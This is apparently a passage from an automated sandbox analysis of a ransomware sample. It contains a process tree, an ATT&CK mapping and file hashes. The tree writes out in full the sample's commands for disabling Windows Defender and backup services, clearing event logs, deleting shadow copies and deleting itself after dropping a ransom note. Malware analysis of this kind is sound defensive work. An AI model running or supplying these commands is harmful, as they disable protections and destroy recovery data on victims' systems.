wmic.exe Token: SeRestorePrivilege 4476 wmic.exe Token: SeShutdownPrivilege 4476 wmic.exe Token: SeDebugPrivilege 4476 wmic.exe Token: SeSystemEnvironmentPrivilege 4476 wmic.exe Token: SeRemoteShutdownPrivilege 4476 wmic.exe Token: SeUndockPrivilege 4476 wmic.exe Token: SeManageVolumePrivilege 4476 wmic.exe Token: 33 4476 wmic.exe Token: 34 4476 wmic.exe Token: 35 4476 wmic.exe Token: 36 4476 wmic.exe Token: SeIncreaseQuotaPrivilege 4476 wmic.exe Token: SeSecurityPrivilege 4476 wmic.exe Token: SeTakeOwnershipPrivilege 4476 wmic.exe Token: SeLoadDriverPrivilege 4476 wmic.exe Token: SeSystemProfilePrivilege 4476 wmic.exe Token: SeSystemtimePrivilege 4476 wmic.exe Token: SeProfSingleProcessPrivilege 4476 wmic.exe Token: SeIncBasePriorityPrivilege 4476 wmic.exe Token: SeCreatePagefilePrivilege 4476 wmic.exe Token: SeBackupPrivilege 4476 wmic.exe Token: SeRestorePrivilege 4476 wmic.exe Token: SeShutdownPrivilege 4476 wmic.exe Token: SeDebugPrivilege 4476 wmic.exe Token: SeSystemEnvironmentPrivilege 4476 wmic.exe Token: SeRemoteShutdownPrivilege 4476 wmic.exe Token: SeUndockPrivilege 4476 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5056 wrote to memory of 3488 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 84 PID 5056 wrote to memory of 3488 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 84 PID 5056 wrote to memory of 3488 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 84 PID 3488 wrote to memory of 1860 3488 net.exe 86 PID 3488 wrote to memory of 1860 3488 net.exe 86 PID 3488 wrote to memory of 1860 3488 net.exe 86 PID 5056 wrote to memory of 440 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 87 PID 5056 wrote to memory of 440 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 87 PID 5056 wrote to memory of 440 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 87 PID 440 wrote to memory of 4244 440 net.exe 89 PID 440 wrote to memory of 4244 440 net.exe 89 PID 440 wrote to memory of 4244 440 net.exe 89 PID 5056 wrote to memory of 892 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 90 PID 5056 wrote to memory of 892 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 90 PID 5056 wrote to memory of 892 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 90 PID 892 wrote to memory of 1104 892 net.exe 92 PID 892 wrote to memory of 1104 892 net.exe 92 PID 892 wrote to memory of 1104 892 net.exe 92 PID 5056 wrote to memory of 4776 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 93 PID 5056 wrote to memory of 4776 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 93 PID 5056 wrote to memory of 4776 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 93 PID 4776 wrote to memory of 100 4776 net.exe 95 PID 4776 wrote to memory of 100 4776 net.exe 95 PID 4776 wrote to memory of 100 4776 net.exe 95 PID 5056 wrote to memory of 1148 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 96 PID 5056 wrote to memory of 1148 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 96 PID 5056 wrote to memory of 1148 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 96 PID 1148 wrote to memory of 4388 1148 net.exe 98 PID 1148 wrote to memory of 4388 1148 net.exe 98 PID 1148 wrote to memory of 4388 1148 net.exe 98 PID 5056 wrote to memory of 3276 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 99 PID 5056 wrote to memory of 3276 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 99 PID 5056 wrote to memory of 3276 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 99 PID 3276 wrote to memory of 1868 3276 net.exe 101 PID 3276 wrote to memory of 1868 3276 net.exe 101 PID 3276 wrote to memory of 1868 3276 net.exe 101 PID 5056 wrote to memory of 2980 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 102 PID 5056 wrote to memory of 2980 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 102 PID 5056 wrote to memory of 2980 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 102 PID 2980 wrote to memory of 4724 2980 net.exe 104 PID 2980 wrote to memory of 4724 2980 net.exe 104 PID 2980 wrote to memory of 4724 2980 net.exe 104 PID 5056 wrote to memory of 3596 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 105 PID 5056 wrote to memory of 3596 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 105 PID 5056 wrote to memory of 3596 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 105 PID 3596 wrote to memory of 1032 3596 net.exe 107 PID 3596 wrote to memory of 1032 3596 net.exe 107 PID 3596 wrote to memory of 1032 3596 net.exe 107 PID 5056 wrote to memory of 4976 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 108 PID 5056 wrote to memory of 4976 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 108 PID 5056 wrote to memory of 4976 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 108 PID 5056 wrote to memory of 4940 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 110 PID 5056 wrote to memory of 4940 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 110 PID 5056 wrote to memory of 4940 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 110 PID 5056 wrote to memory of 3920 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 112 PID 5056 wrote to memory of 3920 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 112 PID 5056 wrote to memory of 3920 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 112 PID 5056 wrote to memory of 3108 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 114 PID 5056 wrote to memory of 3108 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 114 PID 5056 wrote to memory of 3108 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 114 PID 5056 wrote to memory of 4700 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 116 PID 5056 wrote to memory of 4700 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 116 PID 5056 wrote to memory of 4700 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 116 PID 5056 wrote to memory of 4236 5056 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:1860
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4244
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:1104
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵
- System Location Discovery: System Language Discovery
PID:100
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:4388
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:1868
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:4724
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_27357" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_27357" /y3⤵
- System Location Discovery: System Language Discovery
PID:1032
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:4976
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4940
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3920
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3108
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4236
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1408
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_27357" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3768
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:5040
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3412
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2652
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1040
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:5080
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:3428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:976
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:5108
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:388
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:4100
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:3212
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:2744
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3496
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3820
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:712
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3860
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:4720
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:3068
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:1256
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:5004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4388
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\wFLb_HOW_TO_DECRYPT.txt2⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:1784
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe"2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1188 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2620
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
1Indicator Removal
2Clear Windows Event Logs
1File Deletion
1Modify Registry
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51ca4bccdc072b810cb3f0080d616317a
SHA180dea435c073d9b0a2a54a853df4dc058ebd3352
SHA25648f9f649dfdf74a453d0229070bfdadd27c93e014f56cf36992758b70350e169
SHA512fcacc4812f6cd93cb91a5e502fe3571eefba692defdd52f67b55cad3790405535ff156ba87360dcccd86e0766e03ddbd6a1c547b7cd40d1f32ccf7e51dfc4488
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD56c1c28aa2669f200db957171593ea7cf
SHA1a5db16a09e03146257fed7467607db0217184f72
SHA256319757ad61c57b0e0b73e9998613fa931a54a9663689a12fcd501580258b2ebf
SHA5120519251cf107a14f094df1a1544011b49c0af8a704346322b29a301f234065fb785796bd8269f6c55c6c3cd82d6fe20e76d0fe1275c446e5cb64b7e26cecc0e2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82